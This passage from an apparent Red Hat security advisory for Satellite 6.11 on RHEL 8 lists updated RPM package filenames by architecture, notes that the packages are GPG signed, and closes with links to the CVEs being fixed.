katello-common-4.3.0-3.el8sat.noarch.rpm katello-debug-4.3.0-3.el8sat.noarch.rpm puppet-agent-oauth-0.5.1-3.el8sat.noarch.rpm puppet-foreman_scap_client-0.4.0-1.el8sat.noarch.rpm puppetlabs-stdlib-5.2.0-1.el8sat.noarch.rpm puppetserver-7.4.2-1.el8sat.noarch.rpm python2-qpid-1.37.0-1.el8.noarch.rpm python3-ansible-runner-1.4.7-1.el8ar.noarch.rpm python3-daemon-2.1.2-9.el8ar.noarch.rpm python3-lockfile-0.11.0-8.el8ar.noarch.rpm python3-pexpect-4.6-2.el8ar.noarch.rpm python38-aiodns-3.0.0-2.el8pc.noarch.rpm python38-aiofiles-0.7.0-2.el8pc.noarch.rpm python38-aiohttp-xmlrpc-1.5.0-1.el8pc.noarch.rpm python38-aioredis-2.0.0-2.el8pc.noarch.rpm python38-aiosignal-1.2.0-1.el8pc.noarch.rpm python38-ansible-builder-1.0.1-2.el8pc.noarch.rpm python38-asgiref-3.4.1-1.el8pc.noarch.rpm python38-async-lru-1.0.2-2.el8pc.noarch.rpm python38-async-timeout-4.0.2-1.el8pc.noarch.rpm python38-asyncio-throttle-1.0.2-2.el8pc.noarch.rpm python38-attrs-21.2.0-2.el8pc.noarch.rpm python38-backoff-1.11.1-1.el8pc.noarch.rpm python38-bindep-2.10.1-1.el8pc.noarch.rpm python38-bleach-3.3.1-1.el8pc.noarch.rpm python38-bleach-allowlist-1.0.3-2.el8pc.noarch.rpm python38-bracex-2.2-1.el8pc.noarch.rpm python38-certifi-2020.6.20-2.el8pc.noarch.rpm python38-charset-normalizer-2.0.7-1.el8pc.noarch.rpm python38-click-8.0.3-1.el8pc.noarch.rpm python38-click-shell-2.1-2.el8pc.noarch.rpm python38-colorama-0.4.4-2.el8pc.noarch.rpm python38-commonmark-0.9.1-4.el8pc.noarch.rpm python38-contextlib2-21.6.0-2.el8pc.noarch.rpm python38-dataclasses-0.8-2.el8pc.noarch.rpm python38-dateutil-2.8.2-1.el8pc.noarch.rpm python38-debian-0.1.42-1.el8pc.noarch.rpm python38-defusedxml-0.7.1-2.el8pc.noarch.rpm python38-diff-match-patch-20200713-2.el8pc.noarch.rpm python38-distro-1.6.0-2.el8pc.noarch.rpm python38-django-3.2.13-1.el8pc.noarch.rpm python38-django-currentuser-0.5.3-3.el8pc.noarch.rpm python38-django-filter-21.1-1.el8pc.noarch.rpm python38-django-guardian-2.4.0-3.el8pc.noarch.rpm python38-django-guid-3.2.0-2.el8pc.noarch.rpm python38-django-import-export-2.6.1-1.el8pc.noarch.rpm python38-django-lifecycle-0.9.3-1.el8pc.noarch.rpm python38-django-prometheus-2.1.0-2.el8pc.noarch.rpm python38-django-readonly-field-1.0.5-3.el8pc.noarch.rpm python38-djangorestframework-3.12.4-4.el8pc.noarch.rpm python38-djangorestframework-queryfields-1.0.0-4.el8pc.noarch.rpm python38-drf-access-policy-1.1.0-1.el8pc.noarch.rpm python38-drf-nested-routers-0.93.3-3.el8pc.noarch.rpm python38-drf-spectacular-0.20.1-1.el8pc.noarch.rpm python38-dynaconf-3.1.7-2.el8pc.noarch.rpm python38-ecdsa-0.13.3-3.el8pc.noarch.rpm python38-enrich-1.2.6-3.el8pc.noarch.rpm python38-et-xmlfile-1.1.0-1.el8pc.noarch.rpm python38-flake8-3.9.2-3.el8pc.noarch.rpm python38-future-0.18.2-4.el8pc.noarch.rpm python38-galaxy-importer-0.4.1-2.el8pc.noarch.rpm python38-gnupg-0.4.7-2.el8pc.noarch.rpm python38-gunicorn-20.1.0-3.el8pc.noarch.rpm python38-idna-3.3-1.el8pc.noarch.rpm python38-idna-ssl-1.1.0-4.el8pc.noarch.rpm python38-importlib-metadata-1.7.0-2.el8pc.noarch.rpm python38-inflection-0.5.1-2.el8pc.noarch.rpm python38-iniparse-0.4-34.el8pc.noarch.rpm python38-jinja2-3.0.2-1.el8pc.noarch.rpm python38-jsonschema-3.2.0-7.el8pc.noarch.rpm python38-markdown-3.3.4-4.el8pc.noarch.rpm python38-markuppy-1.14-2.el8pc.noarch.rpm python38-mccabe-0.6.1-2.el8pc.noarch.rpm python38-naya-1.1.1-1.el8pc.noarch.rpm python38-odfpy-1.4.1-5.el8pc.noarch.rpm python38-openpyxl-3.0.9-1.el8pc.noarch.rpm python38-packaging-21.2-1.el8pc.noarch.rpm python38-parsley-1.3-1.el8pc.noarch.rpm python38-pbr-5.6.0-1.el8pc.noarch.rpm python38-productmd-1.33-2.el8pc.noarch.rpm python38-prometheus-client-0.8.0-2.el8pc.noarch.rpm python38-pulp-ansible-0.10.1-1.el8pc.noarch.rpm python38-pulp-certguard-1.5.1-1.el8pc.noarch.rpm python38-pulp-cli-0.14.0-1.el8pc.noarch.rpm python38-pulp-container-2.9.2-1.el8pc.noarch.rpm python38-pulp-deb-2.16.1-1.el8pc.noarch.rpm python38-pulp-file-1.10.1-1.el8pc.noarch.rpm python38-pulp-rpm-3.17.5-1.1.el8pc.noarch.rpm python38-pulpcore-3.16.9-1.el8pc.noarch.rpm python38-pyOpenSSL-19.1.0-2.el8pc.noarch.rpm python38-pycodestyle-2.7.0-4.el8pc.noarch.rpm python38-pycparser-2.20-2.el8pc.noarch.rpm python38-pyflakes-2.3.1-4.el8pc.noarch.rpm python38-pygments-2.10.0-2.el8pc.noarch.rpm python38-pygtrie-2.4.2-2.el8pc.noarch.rpm python38-pyjwkest-1.4.2-5.el8pc.noarch.rpm python38-pyjwt-1.7.1-7.el8pc.noarch.rpm python38-pyparsing-2.4.7-2.el8pc.noarch.rpm python38-pytz-2021.3-1.el8pc.noarch.rpm python38-redis-3.5.3-2.el8pc.noarch.rpm python38-requests-2.26.0-3.el8pc.noarch.rpm python38-requirements-parser-0.2.0-2.el8pc.noarch.rpm python38-rich-10.12.0-1.el8pc.noarch.rpm python38-ruamel-yaml-0.17.17-1.el8pc.noarch.rpm python38-schema-0.7.5-1.el8pc.noarch.rpm python38-semantic-version-2.8.5-2.el8pc.noarch.rpm python38-six-1.16.0-1.el8pc.noarch.rpm python38-sqlparse-0.4.2-2.el8pc.noarch.rpm python38-tablib-3.1.0-1.el8pc.noarch.rpm python38-tenacity-7.0.0-2.el8pc.noarch.rpm python38-toml-0.10.2-2.el8pc.noarch.rpm python38-typing-extensions-3.10.0.2-1.el8pc.noarch.rpm python38-uritemplate-4.1.1-1.el8pc.noarch.rpm python38-url-normalize-1.4.3-3.el8pc.noarch.rpm python38-urllib3-1.26.7-1.el8pc.noarch.rpm python38-urlman-1.4.0-2.el8pc.noarch.rpm python38-wcmatch-8.3-1.el8pc.noarch.rpm python38-webencodings-0.5.1-2.el8pc.noarch.rpm python38-whitenoise-5.3.0-1.el8pc.noarch.rpm python38-xlrd-2.0.1-4.el8pc.noarch.rpm python38-xlwt-1.3.0-2.el8pc.noarch.rpm python38-zipp-3.4.0-3.el8pc.noarch.rpm qpid-tools-1.39.0-7.el8amq.noarch.rpm redhat-access-insights-puppet-1.0.1-1.el8sat.noarch.rpm rubygem-algebrick-0.7.3-8.el8sat.noarch.rpm rubygem-ansi-1.5.0-3.el8sat.noarch.rpm rubygem-apipie-params-0.0.5-5.1.el8sat.noarch.rpm rubygem-bundler_ext-0.4.1-6.el8sat.noarch.rpm rubygem-clamp-1.1.2-7.el8sat.noarch.rpm rubygem-concurrent-ruby-1.1.6-3.el8sat.noarch.rpm rubygem-concurrent-ruby-edge-0.6.0-3.el8sat.noarch.rpm rubygem-domain_name-0.5.20160310-5.el8sat.noarch.rpm rubygem-dynflow-1.6.4-1.el8sat.noarch.rpm rubygem-excon-0.76.0-2.el8sat.noarch.rpm rubygem-faraday-0.17.3-2.el8sat.noarch.rpm rubygem-faraday_middleware-0.13.1-3.el8sat.noarch.rpm rubygem-fast_gettext-1.4.1-5.el8sat.noarch.rpm rubygem-foreman_maintain-1.0.12-1.el8sat.noarch.rpm rubygem-gssapi-1.2.0-8.el8sat.noarch.rpm rubygem-hashie-3.6.0-3.el8sat.noarch.rpm rubygem-highline-2.0.3-2.el8sat.noarch.rpm rubygem-http-cookie-1.0.2-5.1.el8sat.noarch.rpm rubygem-infoblox-3.0.0-4.el8sat.noarch.rpm rubygem-journald-logger-2.0.4-3.el8sat.noarch.rpm rubygem-jwt-2.2.2-2.el8sat.noarch.rpm rubygem-kafo-6.4.0-1.el8sat.noarch.rpm rubygem-kafo_parsers-1.2.1-1.el8sat.noarch.rpm rubygem-kafo_wizards-0.0.2-2.el8sat.noarch.rpm rubygem-little-plugger-1.1.4-3.el8sat.noarch.rpm rubygem-logging-2.3.0-2.el8sat.noarch.rpm rubygem-logging-journald-2.0.0-3.el8sat.noarch.rpm rubygem-mime-types-3.3.1-2.el8sat.noarch.rpm rubygem-mime-types-data-3.2018.0812-5.el8sat.noarch.rpm rubygem-mini_portile2-2.5.1-1.el8sat.noarch.rpm rubygem-mqtt-0.5.0-1.el8sat.noarch.rpm rubygem-multi_json-1.14.1-3.el8sat.noarch.rpm rubygem-multipart-post-2.0.0-3.el8sat.noarch.rpm rubygem-mustermann-1.1.1-1.el8sat.noarch.rpm rubygem-net-ssh-4.2.0-3.el8sat.noarch.rpm rubygem-net-ssh-krb-0.4.0-4.el8sat.noarch.rpm rubygem-netrc-0.11.0-6.el8sat.noarch.rpm rubygem-oauth-0.5.4-5.el8sat.noarch.rpm rubygem-openscap-0.4.9-7.el8sat.noarch.rpm rubygem-openscap_parser-1.0.2-2.el8sat.noarch.rpm rubygem-powerbar-2.0.1-3.el8sat.noarch.rpm rubygem-rack-2.2.3-2.el8sat.noarch.rpm rubygem-rack-protection-2.1.0-2.el8sat.noarch.rpm rubygem-rb-inotify-0.9.7-6.el8sat.noarch.rpm rubygem-rbnacl-4.0.2-2.el8sat.noarch.rpm rubygem-redfish_client-0.5.2-2.el8sat.noarch.rpm rubygem-rest-client-2.0.2-4.el8sat.noarch.rpm rubygem-rsec-0.4.3-5.el8sat.noarch.rpm rubygem-ruby2_keywords-0.0.4-1.el8sat.noarch.rpm rubygem-rubyipmi-0.11.0-1.el8sat.noarch.rpm rubygem-sd_notify-0.1.0-2.el8sat.noarch.rpm rubygem-sequel-5.42.0-2.el8sat.noarch.rpm rubygem-server_sent_events-0.1.2-2.el8sat.noarch.rpm rubygem-sinatra-2.1.0-3.el8sat.noarch.rpm rubygem-smart_proxy_ansible-3.3.1-2.el8sat.noarch.rpm rubygem-smart_proxy_container_gateway-1.0.6-1.el8sat.noarch.rpm rubygem-smart_proxy_dhcp_infoblox-0.0.16-6.el8sat.noarch.rpm rubygem-smart_proxy_dhcp_remote_isc-0.0.5-5.el8sat.noarch.rpm rubygem-smart_proxy_discovery-1.0.5-8.el8sat.noarch.rpm rubygem-smart_proxy_discovery_image-1.3.2-3.el8sat.noarch.rpm rubygem-smart_proxy_dns_infoblox-1.1.0-6.el8sat.noarch.rpm rubygem-smart_proxy_dynflow-0.6.3-1.el8sat.noarch.rpm rubygem-smart_proxy_dynflow_core-0.4.1-1.el8sat.noarch.rpm rubygem-smart_proxy_openscap-0.9.2-1.el8sat.noarch.rpm rubygem-smart_proxy_pulp-3.2.0-2.el8sat.noarch.rpm rubygem-smart_proxy_remote_execution_ssh-0.5.3-1.el8sat.noarch.rpm rubygem-smart_proxy_shellhooks-0.9.2-2.el8sat.noarch.rpm rubygem-statsd-instrument-2.1.4-4.el8sat.noarch.rpm rubygem-tilt-2.0.8-5.el8sat.noarch.rpm rubygem-unf-0.1.3-9.el8sat.noarch.rpm satellite-capsule-6.11.0-2.el8sat.noarch.rpm satellite-common-6.11.0-2.el8sat.noarch.rpm satellite-installer-6.11.0.7-1.el8sat.noarch.rpm satellite-maintain-0.0.1-1.el8sat.noarch.rpm x86_64: createrepo_c-0.20.0-1.el8pc.x86_64.rpm createrepo_c-debuginfo-0.20.0-1.el8pc.x86_64.rpm createrepo_c-debugsource-0.20.0-1.el8pc.x86_64.rpm createrepo_c-libs-0.20.0-1.el8pc.x86_64.rpm createrepo_c-libs-debuginfo-0.20.0-1.el8pc.x86_64.rpm dynflow-utils-1.6.3-1.el8sat.x86_64.rpm foreman-discovery-image-service-1.0.0-4.1.el8sat.x86_64.rpm foreman-discovery-image-service-tui-1.0.0-4.1.el8sat.x86_64.rpm libcomps-0.1.18-1.el8pc.x86_64.rpm libcomps-debuginfo-0.1.18-1.el8pc.x86_64.rpm libcomps-debugsource-0.1.18-1.el8pc.x86_64.rpm libdb-cxx-5.3.28-42.el8_4.x86_64.rpm libdb-cxx-debuginfo-5.3.28-42.el8_4.x86_64.rpm libdb-debuginfo-5.3.28-42.el8_4.x86_64.rpm libdb-debugsource-5.3.28-42.el8_4.x86_64.rpm libdb-java-debuginfo-5.3.28-42.el8_4.x86_64.rpm libdb-sql-debuginfo-5.3.28-42.el8_4.x86_64.rpm libdb-sql-devel-debuginfo-5.3.28-42.el8_4.x86_64.rpm libdb-tcl-debuginfo-5.3.28-42.el8_4.x86_64.rpm libdb-utils-debuginfo-5.3.28-42.el8_4.x86_64.rpm libsodium-1.0.17-3.el8sat.x86_64.rpm libsodium-debuginfo-1.0.17-3.el8sat.x86_64.rpm libsodium-debugsource-1.0.17-3.el8sat.x86_64.rpm libsolv-0.7.22-1.el8pc.x86_64.rpm libsolv-debuginfo-0.7.22-1.el8pc.x86_64.rpm libsolv-debugsource-0.7.22-1.el8pc.x86_64.rpm libsolv-demo-debuginfo-0.7.22-1.el8pc.x86_64.rpm libsolv-tools-debuginfo-0.7.22-1.el8pc.x86_64.rpm libwebsockets-2.4.2-2.el8.x86_64.rpm libwebsockets-debuginfo-2.4.2-2.el8.x86_64.rpm libwebsockets-debugsource-2.4.2-2.el8.x86_64.rpm libwebsockets-tests-debuginfo-2.4.2-2.el8.x86_64.rpm pulpcore-selinux-1.3.0-1.el8pc.x86_64.rpm puppet-agent-7.12.1-1.el8sat.x86_64.rpm python-aiohttp-debugsource-3.8.1-2.el8pc.x86_64.rpm python-brotli-debugsource-1.0.9-1.el8pc.x86_64.rpm python-cchardet-debugsource-2.1.7-1.el8pc.x86_64.rpm python-cffi-debugsource-1.15.0-1.el8pc.x86_64.rpm python-cryptography-debugsource-3.1.1-1.el8pc.x86_64.rpm python-frozenlist-debugsource-1.3.0-1.el8pc.x86_64.rpm python-lxml-debugsource-4.7.1-1.el8pc.x86_64.rpm python-markupsafe-debuginfo-2.0.1-2.el8pc.x86_64.rpm python-markupsafe-debugsource-2.0.1-2.el8pc.x86_64.rpm python-multidict-debugsource-5.2.0-1.el8pc.x86_64.rpm python-psutil-debugsource-5.7.2-2.el8sat.x86_64.rpm python-psycopg2-debugsource-2.9.1-1.el8pc.x86_64.rpm python-pycairo-debugsource-1.20.1-2.el8pc.x86_64.rpm python-pycares-debugsource-4.1.2-3.el8pc.x86_64.rpm python-pycryptodomex-debugsource-3.11.0-1.el8pc.x86_64.rpm python-pygobject-debugsource-3.40.1-1.el8pc.x86_64.rpm python-pyrsistent-debugsource-0.18.0-1.el8pc.x86_64.rpm python-rhsm-debugsource-1.19.2-2.el8pc.x86_64.rpm python-ruamel-yaml-clib-debugsource-0.2.6-1.el8pc.x86_64.rpm python-yarl-debugsource-1.7.2-1.el8pc.x86_64.rpm python2-qpid-qmf-1.39.0-7.el8amq.x86_64.rpm python2-saslwrapper-0.22-6.el8sat.x86_64.rpm python2-saslwrapper-debuginfo-0.22-6.el8sat.x86_64.rpm python3-createrepo_c-0.20.0-1.el8pc.x86_64.rpm python3-createrepo_c-debuginfo-0.20.0-1.el8pc.x86_64.rpm python3-libcomps-0.1.18-1.el8pc.x86_64.rpm python3-libcomps-debuginfo-0.1.18-1.el8pc.x86_64.rpm python3-markupsafe-debuginfo-2.0.1-2.el8pc.x86_64.rpm python3-psutil-5.7.2-2.el8sat.x86_64.rpm python3-psutil-debuginfo-5.7.2-2.el8sat.x86_64.rpm python3-qpid-proton-0.33.0-4.el8.x86_64.rpm python3-qpid-proton-debuginfo-0.33.0-4.el8.x86_64.rpm python3-solv-0.7.22-1.el8pc.x86_64.rpm python3-solv-debuginfo-0.7.22-1.el8pc.x86_64.rpm python38-aiohttp-3.8.1-2.el8pc.x86_64.rpm python38-aiohttp-debuginfo-3.8.1-2.el8pc.x86_64.rpm python38-brotli-1.0.9-1.el8pc.x86_64.rpm python38-brotli-debuginfo-1.0.9-1.el8pc.x86_64.rpm python38-cchardet-2.1.7-1.el8pc.x86_64.rpm python38-cchardet-debuginfo-2.1.7-1.el8pc.x86_64.rpm python38-cffi-1.15.0-1.el8pc.x86_64.rpm python38-cffi-debuginfo-1.15.0-1.el8pc.x86_64.rpm python38-createrepo_c-0.20.0-1.el8pc.x86_64.rpm python38-createrepo_c-debuginfo-0.20.0-1.el8pc.x86_64.rpm python38-cryptography-3.1.1-1.el8pc.x86_64.rpm python38-cryptography-debuginfo-3.1.1-1.el8pc.x86_64.rpm python38-frozenlist-1.3.0-1.el8pc.x86_64.rpm python38-frozenlist-debuginfo-1.3.0-1.el8pc.x86_64.rpm python38-libcomps-0.1.18-1.el8pc.x86_64.rpm python38-libcomps-debuginfo-0.1.18-1.el8pc.x86_64.rpm python38-lxml-4.7.1-1.el8pc.x86_64.rpm python38-lxml-debuginfo-4.7.1-1.el8pc.x86_64.rpm python38-markupsafe-2.0.1-2.el8pc.x86_64.rpm python38-markupsafe-debuginfo-2.0.1-2.el8pc.x86_64.rpm python38-multidict-5.2.0-1.el8pc.x86_64.rpm python38-multidict-debuginfo-5.2.0-1.el8pc.x86_64.rpm python38-psycopg2-2.9.1-1.el8pc.x86_64.rpm python38-psycopg2-debuginfo-2.9.1-1.el8pc.x86_64.rpm python38-pycairo-1.20.1-2.el8pc.x86_64.rpm python38-pycairo-debuginfo-1.20.1-2.el8pc.x86_64.rpm python38-pycares-4.1.2-3.el8pc.x86_64.rpm python38-pycares-debuginfo-4.1.2-3.el8pc.x86_64.rpm python38-pycryptodomex-3.11.0-1.el8pc.x86_64.rpm python38-pycryptodomex-debuginfo-3.11.0-1.el8pc.x86_64.rpm python38-pygobject-3.40.1-1.el8pc.x86_64.rpm python38-pygobject-debuginfo-3.40.1-1.el8pc.x86_64.rpm python38-pyrsistent-0.18.0-1.el8pc.x86_64.rpm python38-pyrsistent-debuginfo-0.18.0-1.el8pc.x86_64.rpm python38-pyyaml-5.4.1-3.el8pc.x86_64.rpm python38-rhsm-1.19.2-2.el8pc.x86_64.rpm python38-rhsm-debuginfo-1.19.2-2.el8pc.x86_64.rpm python38-ruamel-yaml-clib-0.2.6-1.el8pc.x86_64.rpm python38-ruamel-yaml-clib-debuginfo-0.2.6-1.el8pc.x86_64.rpm python38-solv-0.7.22-1.el8pc.x86_64.rpm python38-solv-debuginfo-0.7.22-1.el8pc.x86_64.rpm python38-yarl-1.7.2-1.el8pc.x86_64.rpm python38-yarl-debuginfo-1.7.2-1.el8pc.x86_64.rpm qpid-cpp-client-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-client-debuginfo-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-client-devel-debuginfo-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-client-rdma-debuginfo-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-debuginfo-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-debugsource-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-server-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-server-debuginfo-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-server-ha-debuginfo-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-server-linearstore-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-server-linearstore-debuginfo-1.39.0-7.el8amq.x86_64.rpm qpid-cpp-server-rdma-debuginfo-1.39.0-7.el8amq.x86_64.rpm qpid-dispatch-debugsource-1.14.0-6.el8.x86_64.rpm qpid-dispatch-router-1.14.0-6.el8.x86_64.rpm qpid-dispatch-router-debuginfo-1.14.0-6.el8.x86_64.rpm qpid-proton-c-0.33.0-4.el8.x86_64.rpm qpid-proton-c-debuginfo-0.33.0-4.el8.x86_64.rpm qpid-proton-cpp-debuginfo-0.33.0-4.el8.x86_64.rpm qpid-proton-debuginfo-0.33.0-4.el8.x86_64.rpm qpid-proton-debugsource-0.33.0-4.el8.x86_64.rpm qpid-qmf-1.39.0-7.el8amq.x86_64.rpm qpid-qmf-debuginfo-1.39.0-7.el8amq.x86_64.rpm ruby-solv-debuginfo-0.7.22-1.el8pc.x86_64.rpm rubygem-ffi-1.12.2-2.1.el8sat.x86_64.rpm rubygem-ffi-debuginfo-1.12.2-2.1.el8sat.x86_64.rpm rubygem-ffi-debugsource-1.12.2-2.1.el8sat.x86_64.rpm rubygem-journald-native-1.0.11-4.1.el8sat.x86_64.rpm rubygem-journald-native-debuginfo-1.0.11-4.1.el8sat.x86_64.rpm rubygem-journald-native-debugsource-1.0.11-4.1.el8sat.x86_64.rpm rubygem-msgpack-1.3.3-2.1.el8sat.x86_64.rpm rubygem-msgpack-debuginfo-1.3.3-2.1.el8sat.x86_64.rpm rubygem-msgpack-debugsource-1.3.3-2.1.el8sat.x86_64.rpm rubygem-newt-0.9.7-3.1.el8sat.x86_64.rpm rubygem-newt-debuginfo-0.9.7-3.1.el8sat.x86_64.rpm rubygem-newt-debugsource-0.9.7-3.1.el8sat.x86_64.rpm rubygem-nokogiri-1.11.3-2.el8sat.x86_64.rpm rubygem-nokogiri-debuginfo-1.11.3-2.el8sat.x86_64.rpm rubygem-nokogiri-debugsource-1.11.3-2.el8sat.x86_64.rpm rubygem-qpid_proton-debuginfo-0.33.0-4.el8.x86_64.rpm rubygem-rkerberos-0.1.5-20.1.el8sat.x86_64.rpm rubygem-rkerberos-debuginfo-0.1.5-20.1.el8sat.x86_64.rpm rubygem-rkerberos-debugsource-0.1.5-20.1.el8sat.x86_64.rpm rubygem-ruby-libvirt-0.7.1-2.1.el8sat.x86_64.rpm rubygem-ruby-libvirt-debuginfo-0.7.1-2.1.el8sat.x86_64.rpm rubygem-ruby-libvirt-debugsource-0.7.1-2.1.el8sat.x86_64.rpm rubygem-sqlite3-1.3.13-7.1.el8sat.x86_64.rpm rubygem-sqlite3-debuginfo-1.3.13-7.1.el8sat.x86_64.rpm rubygem-sqlite3-debugsource-1.3.13-7.1.el8sat.x86_64.rpm rubygem-unf_ext-0.0.7.2-4.1.el8sat.x86_64.rpm rubygem-unf_ext-debuginfo-0.0.7.2-4.1.el8sat.x86_64.rpm rubygem-unf_ext-debugsource-0.0.7.2-4.1.el8sat.x86_64.rpm saslwrapper-0.22-6.el8sat.x86_64.rpm saslwrapper-debuginfo-0.22-6.el8sat.x86_64.rpm saslwrapper-debugsource-0.22-6.el8sat.x86_64.rpm Red Hat Satellite 6.11 for RHEL 8: Source: rubygem-clamp-1.1.2-7.el8sat.src.rpm rubygem-foreman_maintain-1.0.12-1.el8sat.src.rpm rubygem-highline-2.0.3-2.el8sat.src.rpm satellite-clone-3.1.0-2.el8sat.src.rpm satellite-maintain-0.0.1-1.el8sat.src.rpm noarch: rubygem-clamp-1.1.2-7.el8sat.noarch.rpm rubygem-foreman_maintain-1.0.12-1.el8sat.noarch.rpm rubygem-highline-2.0.3-2.el8sat.noarch.rpm satellite-clone-3.1.0-2.el8sat.noarch.rpm satellite-maintain-0.0.1-1.el8sat.noarch.rpm Red Hat Satellite 6.11 for RHEL 8: Source: foreman-3.1.1.21-2.el8sat.src.rpm rubygem-amazing_print-1.1.0-2.el8sat.src.rpm rubygem-apipie-bindings-0.4.0-2.el8sat.src.rpm rubygem-clamp-1.1.2-7.el8sat.src.rpm rubygem-domain_name-0.5.20160310-5.el8sat.src.rpm rubygem-fast_gettext-1.4.1-5.el8sat.src.rpm rubygem-hammer_cli-3.1.0.1-1.el8sat.src.rpm rubygem-hammer_cli_foreman-3.1.0.1-1.el8sat.src.rpm rubygem-hammer_cli_foreman_admin-1.1.0-1.el8sat.src.rpm rubygem-hammer_cli_foreman_ansible-0.3.4-1.el8sat.src.rpm rubygem-hammer_cli_foreman_azure_rm-0.2.2-1.el8sat.src.rpm rubygem-hammer_cli_foreman_bootdisk-0.3.0-2.el8sat.src.rpm rubygem-hammer_cli_foreman_discovery-1.1.0-1.el8sat.src.rpm rubygem-hammer_cli_foreman_openscap-0.1.13-1.el8sat.src.rpm rubygem-hammer_cli_foreman_remote_execution-0.2.2-1.el8sat.src.rpm rubygem-hammer_cli_foreman_tasks-0.0.17-1.el8sat.src.rpm rubygem-hammer_cli_foreman_templates-0.2.0-2.el8sat.src.rpm rubygem-hammer_cli_foreman_virt_who_configure-0.0.9-1.el8sat.src.rpm rubygem-hammer_cli_foreman_webhooks-0.0.2-1.el8sat.src.rpm rubygem-hammer_cli_katello-1.3.1.6-1.el8sat.src.rpm rubygem-hashie-3.6.0-3.el8sat.src.rpm rubygem-highline-2.0.3-2.el8sat.src.rpm rubygem-http-cookie-1.0.2-5.1.el8sat.src.rpm rubygem-jwt-2.2.2-2.el8sat.src.rpm rubygem-little-plugger-1.1.4-3.el8sat.src.rpm rubygem-locale-2.0.9-15.el8sat.src.rpm rubygem-logging-2.3.0-2.el8sat.src.rpm rubygem-mime-types-3.3.1-2.el8sat.src.rpm rubygem-mime-types-data-3.2018.0812-5.el8sat.src.rpm rubygem-multi_json-1.14.1-3.el8sat.src.rpm rubygem-netrc-0.11.0-6.el8sat.src.rpm rubygem-oauth-0.5.4-5.el8sat.src.rpm rubygem-powerbar-2.0.1-3.el8sat.src.rpm rubygem-rest-client-2.0.2-4.el8sat.src.rpm rubygem-unf-0.1.3-9.el8sat.src.rpm rubygem-unf_ext-0.0.7.2-4.1.el8sat.src.rpm rubygem-unicode-0.4.4.4-4.1.el8sat.src.rpm rubygem-unicode-display_width-1.7.0-2.el8sat.src.rpm satellite-6.11.0-2.el8sat.src.rpm noarch: foreman-cli-3.1.1.21-2.el8sat.noarch.rpm rubygem-amazing_print-1.1.0-2.el8sat.noarch.rpm rubygem-apipie-bindings-0.4.0-2.el8sat.noarch.rpm rubygem-clamp-1.1.2-7.el8sat.noarch.rpm rubygem-domain_name-0.5.20160310-5.el8sat.noarch.rpm rubygem-fast_gettext-1.4.1-5.el8sat.noarch.rpm rubygem-hammer_cli-3.1.0.1-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman-3.1.0.1-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman_admin-1.1.0-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman_ansible-0.3.4-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman_azure_rm-0.2.2-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman_bootdisk-0.3.0-2.el8sat.noarch.rpm rubygem-hammer_cli_foreman_discovery-1.1.0-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman_openscap-0.1.13-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman_remote_execution-0.2.2-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman_tasks-0.0.17-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman_templates-0.2.0-2.el8sat.noarch.rpm rubygem-hammer_cli_foreman_virt_who_configure-0.0.9-1.el8sat.noarch.rpm rubygem-hammer_cli_foreman_webhooks-0.0.2-1.el8sat.noarch.rpm rubygem-hammer_cli_katello-1.3.1.6-1.el8sat.noarch.rpm rubygem-hashie-3.6.0-3.el8sat.noarch.rpm rubygem-highline-2.0.3-2.el8sat.noarch.rpm rubygem-http-cookie-1.0.2-5.1.el8sat.noarch.rpm rubygem-jwt-2.2.2-2.el8sat.noarch.rpm rubygem-little-plugger-1.1.4-3.el8sat.noarch.rpm rubygem-locale-2.0.9-15.el8sat.noarch.rpm rubygem-logging-2.3.0-2.el8sat.noarch.rpm rubygem-mime-types-3.3.1-2.el8sat.noarch.rpm rubygem-mime-types-data-3.2018.0812-5.el8sat.noarch.rpm rubygem-multi_json-1.14.1-3.el8sat.noarch.rpm rubygem-netrc-0.11.0-6.el8sat.noarch.rpm rubygem-oauth-0.5.4-5.el8sat.noarch.rpm rubygem-powerbar-2.0.1-3.el8sat.noarch.rpm rubygem-rest-client-2.0.2-4.el8sat.noarch.rpm rubygem-unf-0.1.3-9.el8sat.noarch.rpm rubygem-unicode-display_width-1.7.0-2.el8sat.noarch.rpm satellite-cli-6.11.0-2.el8sat.noarch.rpm x86_64: rubygem-unf_ext-0.0.7.2-4.1.el8sat.x86_64.rpm rubygem-unf_ext-debuginfo-0.0.7.2-4.1.el8sat.x86_64.rpm rubygem-unf_ext-debugsource-0.0.7.2-4.1.el8sat.x86_64.rpm rubygem-unicode-0.4.4.4-4.1.el8sat.x86_64.rpm rubygem-unicode-debuginfo-0.4.4.4-4.1.el8sat.x86_64.rpm rubygem-unicode-debugsource-0.4.4.4-4.1.el8sat.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3584 https://access.redhat.com/security/cve/CVE-2021-4142 https://access.redhat.com/security/cve/CVE-2021-21290 https://access.redhat.com/security/cve/CVE-2021-21295 https://access.redhat.com/security/cve/CVE-2021-21409 https://access.redhat.com/security/cve/CVE-2021-30151 https://access.redhat.com/security/cve/CVE-2021-32839 https://access.redhat.com/security/cve/CVE-2021-33928 https://access.redhat.com/security/cve/CVE-2021-33929 https://access.redhat.com/security/cve/CVE-2021-33930 https://access.redhat.com/security/cve/CVE-2021-33938 https://access.redhat.com/security/cve/CVE-2021-41136 https://access.redhat.com/security/cve/CVE-2021-42550 https://access.redhat.com/security/cve/CVE-2021-43797 https://access.redhat.com/security/cve/CVE-2021-43818 https://access.redhat.com/security/cve/CVE-2021-44420 https://access.redhat.com/security/cve/CVE-2021-44568 